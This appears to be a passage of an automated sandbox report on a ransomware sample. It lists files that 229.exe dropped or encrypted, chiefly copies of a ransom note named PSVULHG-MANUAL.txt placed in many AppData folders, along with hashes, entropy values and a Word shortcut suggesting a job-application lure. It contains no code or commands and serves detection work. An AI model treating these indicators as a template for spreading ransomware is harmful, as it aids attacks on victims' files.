SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Forms\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\MMC\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	38302
Entropy (8bit):	7.994646001630211
Encrypted:	true
MD5:	4B050E8DA7AA3D458C8F0C82243E3BF4
SHA1:	D4637AA5E1DCEA257F10B3DF08D9E7949329CEF9
SHA-256:	B64433A708556DB51CF758F41F21E61AAAA96387F0E93B9A2E6ED6C9D9E850A5
SHA-512:	2EC3227F93CE78C11912135D90474676DF4FE82D31C85CD7962F6750AF57DE3EB7967E12FD6C686568123382B23E91451C70D30120582138B256CDD0DE6AD489
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Sarah_Siedler_Bewerbungsunterlagen.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 12 10:25:22 2018, mtime=Fri Oct 12 10:25:22 2018, atime=Thu Mar 21 12:00:47 2019, length=56754, window=hide
Size (bytes):	2306
Entropy (8bit):	4.578777872053138
Encrypted:	false
MD5:	5FD5FE23E0A1BFAABA84FEB33149E215
SHA1:	8BB2129C67B2CE11E2E48ECE798F2EB3E4469579
SHA-256:	C54DDD74A9645C0EF6CDEDFC7F8DFF498CFC25DCCBCA6FA9D98E03E051A2BFC2
SHA-512:	30DC852944DED99F3D6AC3FBCCF46BA28E3EE32F12CB584AF3D142A0338EFFE956DB16590A38FD55B7E128BDA665311CD731C23AA63FCE77032CB54D98718846
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	642
Entropy (8bit):	7.647377213393651
Encrypted:	false
MD5:	AD46B6DEA3D28F44CDDE539BAC0D002A
SHA1:	0EDD1E11DB1A2D8528192C0B6373D766A2655DD6
SHA-256:	E59F59B13EB831151548484CF25FA5405DCC3F03D7D9DCE3E58FFFE638D3A5A2
SHA-512:	F5BE0CD26F21CB79C45454ECD139B02952B32955ACABB65F02FB664A2548592AA7AE78C80359579550DD379FD31E26313409ADF2077727DED2B307F5D038FBB3
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Proof\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	564
Entropy (8bit):	7.510903132680684
Encrypted:	false
MD5:	E78BEF60A6E112385ADDCDD2B1748DB3
SHA1:	671EF8F879FE6D53229F4CE957EBB400FC9ECF00
SHA-256:	7D2D6C3468E39875240D86501E4FF8C90491BC6221C7EB1ABAF553A5A08935B1
SHA-512:	A55665F265A7337C907381AEA473BA85EDDB776B434031CBEBBD32DD027A5D82C850796B989471A4A403F33D642D8B1FD4D80156C0BFBECA9D0E951FCCDF4479
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Protect\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\2871d795-bd9f-4b69-af3e-0e6587a4f337 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1008
Entropy (8bit):	7.787729495504501
Encrypted:	false
MD5:	5A78118AD884A6446FE2B0C2E107137B
SHA1:	79FD67904B54F5048E79FA8C8262A97A27360271
SHA-256:	2BEAE57D3D2A7C1222997E9482AF7251765EB09BBE4EA2589C3F497F9DC8207C
SHA-512:	64798392C8585EAFF0DA485FBA8595D041AA5B2759ECE5D7F808AC6A8DB683217FFA16727727AD4ED73D705787BEF471F56D3D291272903A36AFE138AB438114
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\6ace786d-0bfc-40ea-9c38-045c8f5aee5b Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1008
Entropy (8bit):	7.757555413846325
Encrypted:	false
MD5:	5FE1C047400068FF31C8E192C517136D
SHA1:	B956F834E1644603CBF975D28DF147A19A424FCB
SHA-256:	B4347C33742C155CCD6DCEA9F801212DADBA0FC4DFE3402BFB7FD9DCDDFC9F86
SHA-512:	3EE3853A5C25870D5E5F4D201C6C43A9EE77A8EED47B9698CDBD925DCB15B395C4998974715AE3F7EF9D15C5D0AA03C1C3D1159D4B65937B74B124EDBD379129
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\Preferred Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	564
Entropy (8bit):	7.584312413494363
Encrypted:	false
MD5:	F6B2C4912ABE1B1BA887598FF6A433EC
SHA1:	70B29E11DCF492F9B9B9D99998103C6007389140
SHA-256:	9EE94A47CB11332D8587551236BB430E6AA5AAC13AF93160C61D74FEC2C2FC51
SHA-512:	658D0752DA576EE9AF6D2AFC490A157D82D522FB2D22286EC5DF6CF02789ECD61C93AEEECA3C50722AAC2E297AB7D4DC518D6679135D5C0B53FCBD7DC7EAB6C7
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\de18e4af-fe9c-4eb3-aac9-f18a6d7f1a0c Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1008
Entropy (8bit):	7.8014889183113185
Encrypted:	false
MD5:	A202935706E3A18272892E262F8810DB
SHA1:	A48FC3548E1FD0B4DAC5973D953CD776C9D26D36
SHA-256:	A07492716D5D6411BBCDDA349226C4A54EB52725A176217A0BCCFC686671A6B7
SHA-512:	6D460FE81405F1042CA8A641C1D2734543DAEA2DC5B648F6233458315621ECE887CE22D2168A137BD12E2E18ED361D43DFB504B6083B89F1539B6BB0505ED167
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Speech\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01790493[[fn=SOHO]].thmx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	856555
Entropy (8bit):	7.999813226699208
Encrypted:	true
MD5:	96B6A02F8BBF2F072BD3B0479211F4BF
SHA1:	F06C9B10202AF93BF385F1C0DB29652C203FE0E6
SHA-256:	4892ADAA087ADA3671D99E094538FE6C566E6911A36DEF74849FDA9E711F51AE
SHA-512:	C8792F917B19D5764F5D0F26B65BAE0E0B6280ADDE2B3414DFE786B0AB2C85EBF8F446E939E27543C434A9A7D62A4B920B88EC58F0A8A9B3E786C37347484553
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	53843
Entropy (8bit):	7.996062591247828
Encrypted:	true
MD5:	F6CA68D08065DEAFAC3C45678FF10E76
SHA1:	57E8A1E92C463A7A628CBAAD488C58EB14320BF2
SHA-256:	332495770CE9196925CC03971E0947B0DEDD418326784D04F6BF6EB954AEDF52
SHA-512:	FD87C8CC9345FBD3D1885CC11F5A8E3228CE91CCA02FD7D1498070C155DD4A705B275F934028E343E4A7C0A2F6DC18D168B2A8B763DCBA96DAB5B3861C45D885
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Document Themes\1033\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Document Themes\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
